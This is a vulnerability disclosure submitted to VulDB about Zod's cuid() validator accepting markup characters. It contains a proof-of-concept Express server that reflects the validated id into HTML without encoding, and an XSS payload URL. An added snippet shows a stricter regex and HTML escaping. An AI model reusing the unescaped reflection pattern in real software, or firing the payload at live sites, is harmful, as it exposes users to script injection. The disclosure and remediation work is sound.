Submit #796749: colinhacks Zod <=4.3.6 Improper Input Validation

Title: colinhacks Zod <=4.3.6 Improper Input Validation
Description:

### Summary

Zod provides functionality to validate data input, primarily from users, and thousands of websites rely on its validation. The CUID data type should only allow alphanumeric characters. Even though CUID is now considered obsolete and the standard recommendation is to use CUID2, Zod should still prevent unsafe characters such as `{} ' ; < >`, which can lead to XSS, SQL Injection, or Command Injection.

### Details

This is the vulnerable regex line: https://github.com/colinhacks/zod/blob/c7805073fef5b6b8857307c3d4b3597a70613bc2/packages/zod/src/v4/core/regexes.ts#L3

### PoC

XSS exploiting the trust placed in CUID input.

```javascript
const express = require('express');
const { z, ZodError } = require('zod');

const app = express();
const PORT = 3000;

// The only check on the id parameter is Zod's cuid() validator
// (plus a non-empty check).
const CuidSchema = z.object({
  id: z.cuid('The provided ID is not a valid CUID.').min(1, 'The ID parameter is required.'),
});

// Middleware: reject requests whose query string fails the schema.
const validateCuid = (req, res, next) => {
  try {
    const validatedData = CuidSchema.parse(req.query);
    req.validatedQuery = validatedData;
    next();
  } catch (error) {
    if (error instanceof ZodError) {
      return res.status(400).json({
        status: 'error',
        message: 'Input validation failed.',
        errors: error.issues.map(issue => ({
          path: issue.path.join('.'),
          message: issue.message
        }))
      });
    }
    return res.status(500).json({ status: 'error', message: 'Internal server error.' });
  }
};

// The validated id is reflected into HTML without encoding, so any
// markup that passes the cuid() regex is rendered by the browser.
app.get('/item', validateCuid, (req, res) => {
  const validCuid = req.validatedQuery.id;
  res.status(200).send(`
    <!DOCTYPE html>
    <html lang="en">
    <body>
      <h1>Valid CUID Received</h1>
      <p>The provided CUID is: <strong>${validCuid}</strong></p>
    </body>
    </html>
  `);
});

app.listen(PORT, () => {
  console.log(`Server running at http://localhost:${PORT}`);
  console.log(`Test a valid route: http://localhost:${PORT}/item?id=ck0a79p0000002p572b1v2s8v`);
  console.log(`Test an invalid route: http://localhost:${PORT}/item?id=c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v`);
});
```

(Screenshot of the result attached to the original submission.)

### Impact

Improper input validation is a critical security flaw that can lead to severe vulnerabilities like Cross-Site Scripting (XSS), SQL Injection (SQLi), and Remote Code Execution (RCE). This makes it extremely important that input be strictly limited to alphanumeric characters whenever possible. By enforcing this restriction, you prevent malicious characters (like quotes, angle brackets, or semicolons) from being processed by the system's runtime, database, or browser, effectively mitigating these injection risks.
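As an added illustration (not part of this submission and not Zod project code), the following stand-alone JavaScript reproduces the check the PoC depends on without needing express or zod installed. It puts three things side by side: the cuid pattern as I recall it from the regexes.ts line linked in the Details section (an assumption; verify against that commit), a stricter pattern matching the classic 25-character CUID layout (also an assumption about what a given ID generator emits), and HTML output encoding, which stops the reflected XSS in the PoC handler regardless of what the validator lets through.

```javascript
// Added example; not code from the VulDB submission or from Zod.

// ASSUMPTION: the pattern at the linked regexes.ts line, reproduced from
// memory. It only forbids whitespace and '-', so '<', '>', quotes and
// parentheses all pass.
const ZOD_CUID_REGEX = /^[cC][^\s-]{8,}$/;

// ASSUMPTION: classic CUID layout, 'c' followed by 24 lowercase base-36
// characters. Adjust to whatever your ID generator actually produces.
const STRICT_CUID_REGEX = /^c[0-9a-z]{24}$/;

function isZodCuid(id) {
  return ZOD_CUID_REGEX.test(id);
}

function isStrictCuid(id) {
  return STRICT_CUID_REGEX.test(id);
}

// Output encoding for HTML text and attribute contexts. This is the
// browser-side fix that holds even when the validator is too permissive.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The fragment the PoC handler renders, but with the id encoded.
function renderItem(id) {
  return `<p>The provided CUID is: <strong>${escapeHtml(id)}</strong></p>`;
}

// Constructed sample inputs, taken from the two URLs printed by the PoC:
// the valid id and the XSS payload, decoded as req.query would deliver it.
const VALID_ID = 'ck0a79p0000002p572b1v2s8v';
const PAYLOAD = decodeURIComponent(
  'c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v'
);

// Run both validators over one id and report the verdicts.
function classify(id) {
  return { zod: isZodCuid(id), strict: isStrictCuid(id) };
}

for (const id of [VALID_ID, PAYLOAD]) {
  console.log(JSON.stringify(id), classify(id));
}
console.log(renderItem(PAYLOAD));
```

The permissive pattern accepts the payload because it contains no whitespace and no hyphen; the strict pattern rejects it on the first `<`. Even with the strict pattern in place, `renderItem` still encodes the value, because a validator is not the layer that should be trusted to keep markup out of an HTML response.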
User: dsonbacker (UID 46970)
Submission: 03.04.2026 23:54 (24 days ago)
Moderation: 24.04.2026 21:38 (21 days later)
Status: Accepted
VulDB Entry: 359543 [colinhacks Zod up to 4.3.6 CUID Data Type regexes.ts SQL Injection]
Points: 17
